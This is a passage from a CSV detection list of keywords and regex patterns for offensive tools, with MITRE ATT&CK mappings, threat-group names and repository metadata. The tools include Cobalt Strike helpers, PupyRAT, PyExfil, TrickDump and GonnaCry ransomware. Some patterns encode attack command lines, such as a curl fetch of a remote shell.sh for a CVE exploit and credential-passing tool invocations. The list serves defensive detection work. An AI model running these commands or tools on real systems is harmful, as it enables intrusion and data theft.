T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","55933" "*pycobalt_debug_on*",".{0,1000}pycobalt_debug_on.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - 
APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","55934" "*pycobalt_path*",".{0,1000}pycobalt_path.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - 
NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","55935" "*pycobalt_python*",".{0,1000}pycobalt_python.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","55936" "*pycobalt_timeout*",".{0,1000}pycobalt_timeout.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","55937" "*pydictor*",".{0,1000}pydictor.{0,1000}","offensive_tool_keyword","pydictor","pydictor A powerful and useful hacker dictionary builder for a brute-force attack","T1110 - T1111 - T1210 - 
T1558.004","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/LandGrey/pydictor","1","0","N/A","N/A","N/A","10","3360","642","2024-12-05T02:45:11Z","2016-08-17T08:16:56Z","55938" "*pyexec -c *",".{0,1000}pyexec\s\-c\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55939" "*pyexec --file*",".{0,1000}pyexec\s\-\-file.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55940" "*PyExec-main.*",".{0,1000}PyExec\-main\..{0,1000}","offensive_tool_keyword","PyExec","This 
is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","N/A","9","1","11","7","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z","55941" "*pyexfil.Comm.AllJoyn*",".{0,1000}pyexfil\.Comm\.AllJoyn.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55942" "*pyexfil.Comm.DNSoTLS.client*",".{0,1000}pyexfil\.Comm\.DNSoTLS\.client.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55943" "*pyexfil.Comm.DNSoTLS.server*",".{0,1000}pyexfil\.Comm\.DNSoTLS\.server.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55944" "*pyexfil.Comm.GQUIC*",".{0,1000}pyexfil\.Comm\.GQUIC.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55945" "*pyexfil.Comm.jetdirect.communicator*",".{0,1000}pyexfil\.Comm\.jetdirect\.communicator.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - 
TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55946" "*pyexfil.Comm.MDNS*",".{0,1000}pyexfil\.Comm\.MDNS.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55947" "*pyexfil.Comm.NTP_Body.client*",".{0,1000}pyexfil\.Comm\.NTP_Body\.client.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55948" "*pyexfil.Comm.NTP_Body.server*",".{0,1000}pyexfil\.Comm\.NTP_Body\.server.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55949" "*pyexfil.HTTPS.https_client*",".{0,1000}pyexfil\.HTTPS\.https_client.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55950" "*pyexfil.HTTPS.https_server*",".{0,1000}pyexfil\.HTTPS\.https_server.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data 
Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55951" "*pyexfil.includes.data_generator*",".{0,1000}pyexfil\.includes\.data_generator.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55952" "*pyexfil.includes.encryption_wrappers*",".{0,1000}pyexfil\.includes\.encryption_wrappers.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55953" "*pyexfil.includes.exceptions*",".{0,1000}pyexfil\.includes\.exceptions.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55954" "*pyexfil.includes.general*",".{0,1000}pyexfil\.includes\.general.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55955" "*pyexfil.includes.image_manipulation*",".{0,1000}pyexfil\.includes\.image_manipulation.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data 
Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55956" "*pyexfil.includes.prepare*",".{0,1000}pyexfil\.includes\.prepare.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55957" "*PyExfil.MoriRT.com*",".{0,1000}PyExfil\.MoriRT\.com.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55958" "*pyexfil.network*",".{0,1000}pyexfil\.network.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55959" "*pyexfil.network.DB_LSP.dblsp*",".{0,1000}pyexfil\.network\.DB_LSP\.dblsp.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55960" "*pyexfil.network.FTP.ftp_exfil*",".{0,1000}pyexfil\.network\.FTP\.ftp_exfil.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55961" 
"*pyexfil.network.HTTP_Cookies.http_exfiltration*",".{0,1000}pyexfil\.network\.HTTP_Cookies\.http_exfiltration.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55962" "*pyexfil.network.HTTPResp.client*",".{0,1000}pyexfil\.network\.HTTPResp\.client.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55963" "*pyexfil.network.ICMP.icmp_exfiltration*",".{0,1000}pyexfil\.network\.ICMP\.icmp_exfiltration.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55964" "*pyexfil.network.SpoofIP.spoofIPs_client*",".{0,1000}pyexfil\.network\.SpoofIP\.spoofIPs_client.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55965" "*pyexfil.physical.qr.generator*",".{0,1000}pyexfil\.physical\.qr\.generator.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55966" 
"*pyexfil.physical.wifiPayload.client*",".{0,1000}pyexfil\.physical\.wifiPayload\.client.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55967" "*pyexfil.Stega.binoffset.binoffset*",".{0,1000}pyexfil\.Stega\.binoffset\.binoffset.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55968" "*PYEXFIL_DEFAULT_PASSWORD*",".{0,1000}PYEXFIL_DEFAULT_PASSWORD.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55969" "*pyExfil-latest.zip*",".{0,1000}pyExfil\-latest\.zip.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55970" "*PyExfil-master*",".{0,1000}PyExfil\-master.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55971" "*pygpoabuse * -hashes lm:* -gpo-id *",".{0,1000}pygpoabuse\s.{0,1000}\s\-hashes\slm\:.{0,1000}\s\-gpo\-id\s.{0,1000}","offensive_tool_keyword","exegol","Fully 
featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55972" "*pygpoabuse.py*",".{0,1000}pygpoabuse\.py.{0,1000}","offensive_tool_keyword","pyGPOAbuse","python implementation of SharpGPOAbuse","T1566.001 - T1059.006 - T1112","TA0001 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/Hackndo/pyGPOAbuse","1","1","N/A","N/A","8","5","416","48","2024-02-18T19:23:57Z","2020-05-10T21:21:27Z","55973" "*pyherion.py*",".{0,1000}pyherion\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","55974" "*pyhon3 poc.py * curl http://*/shell.sh -o /tmp/shell.sh*",".{0,1000}pyhon3\spoc\.py\s.{0,1000}\scurl\shttp\:\/\/.{0,1000}\/shell\.sh\s\-o\s\/tmp\/shell\.sh.{0,1000}","offensive_tool_keyword","POC","Automated PoC exploitation of CVE-2021-44521","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/QHpix/CVE-2021-44521","1","0","#linux","N/A","N/A","1","9","2","2022-02-24T12:04:40Z","2022-02-24T11:07:34Z","55975" "*pyinstaller -F barrel.py*",".{0,1000}pyinstaller\s\-F\sbarrel\.py.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential 
Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","55977" "*pyinstaller -F --clean GonnaCry*",".{0,1000}pyinstaller\s\-F\s\-\-clean\sGonnaCry.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","55978" "*pyinstaller -F lock.py*",".{0,1000}pyinstaller\s\-F\slock\.py.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","55979" "*pyinstaller -F shock.py*",".{0,1000}pyinstaller\s\-F\sshock\.py.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","55980" "*pyinstaller netexec.spec*",".{0,1000}pyinstaller\snetexec\.spec.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","55981" "*pyLAPS.py --action get -d * -u * -p * 
--dc-ip *",".{0,1000}pyLAPS\.py\s\-\-action\sget\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55987" "*pyLAPS-main*",".{0,1000}pyLAPS\-main.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","#linux","N/A","9","2","105","16","2024-10-28T08:36:38Z","2021-10-05T18:35:21Z","55988" "*pyMalleableC2*",".{0,1000}pyMalleableC2.{0,1000}","offensive_tool_keyword","cobaltstrike","Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 